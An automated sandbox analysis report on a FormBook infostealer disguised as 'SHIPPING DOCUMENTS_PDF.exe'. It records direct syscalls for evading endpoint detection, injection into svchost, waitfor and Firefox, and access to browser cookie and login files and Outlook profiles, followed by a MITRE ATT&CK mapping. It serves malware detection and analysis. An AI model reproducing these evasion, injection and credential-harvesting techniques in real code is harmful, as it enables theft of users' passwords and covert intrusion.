                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]2_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]2_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]2_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]2_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]2_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]2_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]2_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]2_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]2_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]2_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]2_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]2_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]2_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]2_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]2_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]2_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]2_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]2_2_03042840
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00BA80A9
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7A124 SetUnhandledExceptionFilter,0_2_00B7A124
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B7A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 5300Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\waitfor.exeThread APC queued: target process: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 257008Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA87B1 LogonUserW,0_2_00BA87B1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B53B3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B548D7
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB4C27 mouse_event,0_2_00BB4C27
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00BA7CAF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BA874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BA874B
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: SHIPPING DOCUMENTS_PDF.exe, pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170603809.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472998871.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000000.2312740289.0000000001191000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B7862B cpuid 0_2_00B7862B
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B84E87
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B91E06 GetUserNameW,0_2_00B91E06
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B83F3A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B549A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_81
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_XP
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_XPe
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_VISTA
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_7
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: WIN_8
                Source: SHIPPING DOCUMENTS_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BC6283
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BC6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
